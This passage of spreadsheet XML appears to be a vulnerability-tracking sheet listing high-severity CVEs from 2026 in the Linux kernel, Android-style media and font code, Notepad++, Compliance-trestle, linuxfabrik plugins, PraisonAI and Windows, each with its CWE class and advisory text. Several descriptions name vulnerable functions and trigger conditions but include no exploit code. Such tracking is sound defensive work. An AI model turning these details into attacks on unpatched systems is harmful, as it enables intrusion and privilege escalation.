      <c r="F2065" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2065" s="5" t="inlineStr"/>
      <c r="H2065" s="5" t="inlineStr"/>
      <c r="I2065" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2065" s="5" t="inlineStr"/>
      <c r="K2065" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2065" s="5" t="inlineStr">
        <is>
          <t>In tt_face_colr_blend_layer of ttcolr.c, there is a possible remote code execution due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2065" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49919</t>
        </is>
      </c>
    </row>
    <row r="2066">
      <c r="A2066" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2066" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49927</t>
        </is>
      </c>
      <c r="C2066" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2066" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2066" s="5" t="inlineStr"/>
      <c r="F2066" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2066" s="5" t="inlineStr"/>
      <c r="H2066" s="5" t="inlineStr"/>
      <c r="I2066" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2066" s="5" t="inlineStr"/>
      <c r="K2066" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2066" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2066" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49927</t>
        </is>
      </c>
    </row>
    <row r="2067">
      <c r="A2067" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2067" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49932</t>
        </is>
      </c>
      <c r="C2067" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2067" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2067" s="5" t="inlineStr"/>
      <c r="F2067" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2067" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2067" s="5" t="inlineStr"/>
      <c r="I2067" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2067" s="5" t="inlineStr"/>
      <c r="K2067" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2067" s="5" t="inlineStr">
        <is>
          <t>In parseParts of PduParser.java, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2067" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49932</t>
        </is>
      </c>
    </row>
    <row r="2068">
      <c r="A2068" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2068" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52489</t>
        </is>
      </c>
      <c r="C2068" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2068" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2068" s="5" t="inlineStr"/>
      <c r="F2068" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2068" s="5" t="inlineStr"/>
      <c r="H2068" s="5" t="inlineStr"/>
      <c r="I2068" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2068" s="5" t="inlineStr"/>
      <c r="K2068" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L2068" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in gpac 31becc9e08b88e525a4a62013a4000de1c0f8fd9 allows an attacker to execute arbitrary code via the svgNameToImplementationName() function</t>
        </is>
      </c>
      <c r="M2068" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52489</t>
        </is>
      </c>
    </row>
    <row r="2069">
      <c r="A2069" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2069" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52492</t>
        </is>
      </c>
      <c r="C2069" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2069" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2069" s="5" t="inlineStr"/>
      <c r="F2069" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2069" s="5" t="inlineStr"/>
      <c r="H2069" s="5" t="inlineStr"/>
      <c r="I2069" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J2069" s="5" t="inlineStr"/>
      <c r="K2069" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2069" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the libtiff rgb2ycbcr utility's cvtRaster() function when computing strip buffer sizes can result in an undersized heap allocation and subsequent heap-based buffer overflow during YCbCr conversion of a crafted TIFF image</t>
        </is>
      </c>
      <c r="M2069" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52492</t>
        </is>
      </c>
    </row>
    <row r="2070">
      <c r="A2070" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2070" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52987</t>
        </is>
      </c>
      <c r="C2070" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2070" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2070" s="5" t="inlineStr"/>
      <c r="F2070" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2070" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2070" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2070" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J2070" s="5" t="inlineStr"/>
      <c r="K2070" s="5" t="inlineStr">
        <is>
          <t>CWE-1341</t>
        </is>
      </c>
      <c r="L2070" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: avoid double drm_exec_fini() in userq validate
When new_addition is true, amdgpu_userq_vm_validate() calls
drm_exec_fini(&amp;exec) before iterating over the collected HMM ranges and
calling amdgpu_ttm_tt_get_user_pages().
If amdgpu_ttm_tt_get_user_pages() fails in that path, the code jumps to
unlock_all and calls drm_exec_fini(&amp;exec) a second time on the same
exec object. drm_exec_fini() is not idempotent: it frees exec-&gt;objects
and may also drop exec-&gt;contended and finalize the ww acquire context.
Route that error path directly to the range cleanup once exec has
already been finalized.
Issue found using a prototype static analysis tool
and confirmed by code review.
(cherry picked from commit 2802952e4a07306da6ebe813ff1acacc5691851a)</t>
        </is>
      </c>
      <c r="M2070" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52987</t>
        </is>
      </c>
    </row>
    <row r="2071">
      <c r="A2071" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2071" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53000</t>
        </is>
      </c>
      <c r="C2071" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2071" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2071" s="5" t="inlineStr"/>
      <c r="F2071" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2071" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2071" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I2071" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J2071" s="5" t="inlineStr"/>
      <c r="K2071" s="5" t="inlineStr">
        <is>
          <t>CWE-763</t>
        </is>
      </c>
      <c r="L2071" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: nat: use kfree_rcu to release ops
Florian Westphal says:
"Historically this is not an issue, even for normal base hooks: the data
path doesn't use the original nf_hook_ops that are used to register the
callbacks.
However, in v5.14 I added the ability to dump the active netfilter
hooks from userspace.
This code will peek back into the nf_hook_ops that are available
at the tail of the pointer-array blob used by the datapath.
The nat hooks are special, because they are called indirectly from
the central nat dispatcher hook. They are currently invisible to
the nfnl hook dump subsystem though.
But once that changes the nat ops structures have to be deferred too."
Update nf_nat_register_fn() to deal with partial exposition of the hooks
from error path which can be also an issue for nfnetlink_hook.</t>
        </is>
      </c>
      <c r="M2071" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53000</t>
        </is>
      </c>
    </row>
    <row r="2072">
      <c r="A2072" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2072" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53009</t>
        </is>
      </c>
      <c r="C2072" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2072" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2072" s="5" t="inlineStr"/>
      <c r="F2072" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2072" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2072" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I2072" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J2072" s="5" t="inlineStr"/>
      <c r="K2072" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-416</t>
        </is>
      </c>
      <c r="L2072" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ice: fix double-free of tx_buf skb
If ice_tso() or ice_tx_csum() fail, the error path in
ice_xmit_frame_ring() frees the skb, but the 'first' tx_buf still points
to it and is marked as valid (ICE_TX_BUF_SKB).
'next_to_use' remains unchanged, so the potential problem will
likely fix itself when the next packet is transmitted and the tx_buf
gets overwritten. But if there is no next packet and the interface is
brought down instead, ice_clean_tx_ring() -&gt; ice_unmap_and_free_tx_buf()
will find the tx_buf and free the skb for the second time.
The fix is to reset the tx_buf type to ICE_TX_BUF_EMPTY in the error
path, so that ice_unmap_and_free_tx_buf().
Move the initialization of 'first' up, to ensure it's already valid in
case we hit the linearization error path.
The bug was spotted by AI while I had it looking for something else.
It also proposed an initial version of the patch.
I reproduced the bug and tested the fix by adding code to inject
failures, on a build with KASAN.
I looked for similar bugs in related Intel drivers and did not find any.</t>
        </is>
      </c>
      <c r="M2072" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53009</t>
        </is>
      </c>
    </row>
    <row r="2073">
      <c r="A2073" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2073" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53016</t>
        </is>
      </c>
      <c r="C2073" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2073" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2073" s="5" t="inlineStr"/>
      <c r="F2073" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2073" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2073" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2073" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J2073" s="5" t="inlineStr"/>
      <c r="K2073" s="5" t="inlineStr">
        <is>
          <t>CWE-787, CWE-805</t>
        </is>
      </c>
      <c r="L2073" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: ccp - copy IV using skcipher ivsize
AF_ALG rfc3686-ctr-aes-ccp requests pass an 8-byte IV to the driver.
ccp_aes_complete() restores AES_BLOCK_SIZE bytes into the caller's IV
buffer while RFC3686 skciphers expose an 8-byte IV, so the restore
overruns the provided buffer.
Use crypto_skcipher_ivsize() to copy only the algorithm's IV length.</t>
        </is>
      </c>
      <c r="M2073" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53016</t>
        </is>
      </c>
    </row>
    <row r="2074">
      <c r="A2074" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2074" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53185</t>
        </is>
      </c>
      <c r="C2074" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2074" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2074" s="5" t="inlineStr"/>
      <c r="F2074" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2074" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2074" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2074" s="5" t="inlineStr">
        <is>
          <t>2026-06-25</t>
        </is>
      </c>
      <c r="J2074" s="5" t="inlineStr"/>
      <c r="K2074" s="5" t="inlineStr">
        <is>
          <t>CWE-364, CWE-416</t>
        </is>
      </c>
      <c r="L2074" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
zram: fix use-after-free in zram_bvec_write_partial()
zram_read_page() picks the sync or async backing device read path based on
whether the parent bio is NULL.  zram_bvec_write_partial() passes its
parent bio down, so for ZRAM_WB slots the read is dispatched
asynchronously and zram_read_page() returns 0 while the bio is still in
flight.  The caller then runs memcpy_from_bvec(), zram_write_page() and
__free_page() on the buffer, leaving the async read to write into a freed
page.
zram_bvec_read_partial() was switched to NULL in commit 4e3c87b9421d
("zram: fix synchronous reads") for the same reason; the write_partial
counterpart was missed.</t>
        </is>
      </c>
      <c r="M2074" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53185</t>
        </is>
      </c>
    </row>
    <row r="2075">
      <c r="A2075" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2075" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54757</t>
        </is>
      </c>
      <c r="C2075" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2075" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2075" s="5" t="inlineStr"/>
      <c r="F2075" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2075" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2075" s="5" t="inlineStr"/>
      <c r="I2075" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2075" s="5" t="inlineStr"/>
      <c r="K2075" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L2075" s="5" t="inlineStr">
        <is>
          <t>Compliance-trestle (Trestle) is a Python SDK and command-line tool for managing OSCAL compliance documents. In versions before 3.12.4 and versions 4.0.0 through 4.0.3, Trestle is vulnerable to server-side template injection that can lead to remote code execution. This occurs because the MDCleanInclude and MDSectionInclude Jinja2 tags re-parse untrusted Markdown content as template source code using a non-sandboxed jinja2.Environment. An attacker who controls content that Trestle renders, such as a crafted workspace Markdown file, a third-party SSP document, or a YAML lookup-table value, can inject a Jinja2 expression that traverses Python object internals to execute arbitrary operating system commands in the context of the Trestle process. This issue is fixed in versions 3.12.4 and 4.1.0.</t>
        </is>
      </c>
      <c r="M2075" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54757</t>
        </is>
      </c>
    </row>
    <row r="2076">
      <c r="A2076" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2076" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54758</t>
        </is>
      </c>
      <c r="C2076" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2076" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2076" s="5" t="inlineStr"/>
      <c r="F2076" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2076" s="5" t="inlineStr"/>
      <c r="H2076" s="5" t="inlineStr"/>
      <c r="I2076" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J2076" s="5" t="inlineStr"/>
      <c r="K2076" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-787</t>
        </is>
      </c>
      <c r="L2076" s="5" t="inlineStr">
        <is>
          <t>Notepad++ is a free and open-source source code editor. Prior to 8.9.7, the expandNppEnvironmentStrs function in PowerEditor/src/WinControls/StaticDialog/RunDlg/RunDlg.cpp copies a Notepad++ variable name between $( and ) into the fixed-size wchar_t str[MAX_PATH] stack buffer without bounding the m loop index, allowing a name of 260 or more characters to corrupt adjacent stack data, terminate the process through __report_gsfailure, and potentially execute code. This issue is fixed in version 8.9.7.</t>
        </is>
      </c>
      <c r="M2076" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54758</t>
        </is>
      </c>
    </row>
    <row r="2077">
      <c r="A2077" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2077" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55273</t>
        </is>
      </c>
      <c r="C2077" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2077" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2077" s="5" t="inlineStr"/>
      <c r="F2077" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2077" s="5" t="inlineStr"/>
      <c r="H2077" s="5" t="inlineStr"/>
      <c r="I2077" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2077" s="5" t="inlineStr"/>
      <c r="K2077" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L2077" s="5" t="inlineStr">
        <is>
          <t>In AppendCommentLine of AnnotationProcessor.cpp, there is a possible supply chain risk due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2077" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55273</t>
        </is>
      </c>
    </row>
    <row r="2078">
      <c r="A2078" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2078" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55285</t>
        </is>
      </c>
      <c r="C2078" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2078" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2078" s="5" t="inlineStr"/>
      <c r="F2078" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2078" s="5" t="inlineStr"/>
      <c r="H2078" s="5" t="inlineStr"/>
      <c r="I2078" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2078" s="5" t="inlineStr"/>
      <c r="K2078" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L2078" s="5" t="inlineStr">
        <is>
          <t>In openLogicalChannel of multiple files, there is a possible out-of-bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2078" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55285</t>
        </is>
      </c>
    </row>
    <row r="2079">
      <c r="A2079" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2079" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55294</t>
        </is>
      </c>
      <c r="C2079" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2079" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2079" s="5" t="inlineStr"/>
      <c r="F2079" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2079" s="5" t="inlineStr"/>
      <c r="H2079" s="5" t="inlineStr"/>
      <c r="I2079" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2079" s="5" t="inlineStr"/>
      <c r="K2079" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2079" s="5" t="inlineStr">
        <is>
          <t>In ihevcd_get_tu_data_size of ihevcd_utils.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2079" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55294</t>
        </is>
      </c>
    </row>
    <row r="2080">
      <c r="A2080" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2080" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55426</t>
        </is>
      </c>
      <c r="C2080" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2080" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2080" s="5" t="inlineStr"/>
      <c r="F2080" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2080" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2080" s="5" t="inlineStr"/>
      <c r="I2080" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2080" s="5" t="inlineStr"/>
      <c r="K2080" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2080" s="5" t="inlineStr">
        <is>
          <t>linuxfabrik-lib provides Python modules for database access, caching, shell execution, and API integrations, and Linuxfabrik Monitoring Plugins uses those modules to run external monitoring commands. From the earliest affected releases until linuxfabrik-lib 5.0.0 and Linuxfabrik Monitoring Plugins 6.0.0, check plugins embedded user-controlled values in command strings passed to lib.shell.shell_exec(), which split strings at pipe characters and executed the resulting commands. In check-plugins/restic-check/restic-check, the --repo parameter could inject a pipe-delimited command into a constructed restic invocation, and sudo-authorized execution allowed a compromised nagios or icinga account to run that command as root. The shared library also accepted command strings and a shell parameter, while numerous plugins constructed external commands from attacker-influenced arguments. The fixes require argv lists, always use shell=False, remove pipe splitting, and reject option-like positional values through lib.shell.safe_cli_value(). These issues are fixed in linuxfabrik-lib 5.0.0 and Linuxfabrik Monitoring Plugins 6.0.0.</t>
        </is>
      </c>
      <c r="M2080" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55426</t>
        </is>
      </c>
    </row>
    <row r="2081">
      <c r="A2081" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2081" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55522</t>
        </is>
      </c>
      <c r="C2081" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2081" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2081" s="5" t="inlineStr"/>
      <c r="F2081" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2081" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2081" s="5" t="inlineStr"/>
      <c r="I2081" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2081" s="5" t="inlineStr"/>
      <c r="K2081" s="5" t="inlineStr">
        <is>
          <t>CWE-426, CWE-829, CWE-94</t>
        </is>
      </c>
      <c r="L2081" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. In versions 3.9.26 through 4.6.57 of praiseonai and 0.12.12 through 1.6.57 of praiseonaiagents, the workflow "include" feature is vulnerable to code execution. Workflow._execute_include() implicitly imports and runs an included recipe's tools.py via a raw importlib.util.spec_from_file_location() and spec.loader.exec_module() call, without honoring the PRAISONAI_ALLOW_TEMPLATE_TOOLS/PRAISONAI_ALLOW_LOCAL_TOOLS autoload opt-in gates or routing through the centralized safe loader that protects the other tools.py autoload paths. As a result, a workflow that includes an attacker-controlled local recipe directory executes arbitrary module-level Python code during include setup, before any child workflow parsing or model call, and the same sink is reachable through the higher-level praisonai.recipe.run() recipe API. An attacker who can cause a victim process to run a workflow or recipe that includes an untrusted local recipe achieves arbitrary Python code execution as the PraisonAI process user, a variant that bypasses the hardening applied to the previously disclosed automatic tools.py RCE advisory family. This issue has been fixed in version 4.6.58 of praisonai and 1.6.58 of praisonaiagents.</t>
        </is>
      </c>
      <c r="M2081" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55522</t>
        </is>
      </c>
    </row>
    <row r="2082">
      <c r="A2082" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2082" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56172</t>
        </is>
      </c>
      <c r="C2082" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2082" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2082" s="5" t="inlineStr"/>
      <c r="F2082" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2082" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2082" s="5" t="inlineStr"/>
      <c r="I2082" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2082" s="5" t="inlineStr"/>
      <c r="K2082" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2082" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows VHD miniport driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2082" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56172</t>
        </is>
      </c>
    </row>
    <row r="2083">
      <c r="A2083" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2083" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56177</t>
        </is>
      </c>
      <c r="C2083" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2083" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2083" s="5" t="inlineStr"/>
      <c r="F2083" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2083" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2083" s="5" t="inlineStr"/>
      <c r="I2083" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2083" s="5" t="inlineStr"/>
      <c r="K2083" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2083" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2083" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56177</t>
        </is>
      </c>
    </row>
    <row r="2084">
      <c r="A2084" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2084" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56198</t>
        </is>
      </c>
      <c r="C2084" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2084" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2084" s="5" t="inlineStr"/>
      <c r="F2084" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2084" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2084" s="5" t="inlineStr"/>
      <c r="I2084" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2084" s="5" t="inlineStr"/>
      <c r="K2084" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2084" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Trace Data Helper allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2084" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56198</t>
        </is>
      </c>
    </row>
    <row r="2085">
      <c r="A2085" s="5" t="inlineStr">
        <is>
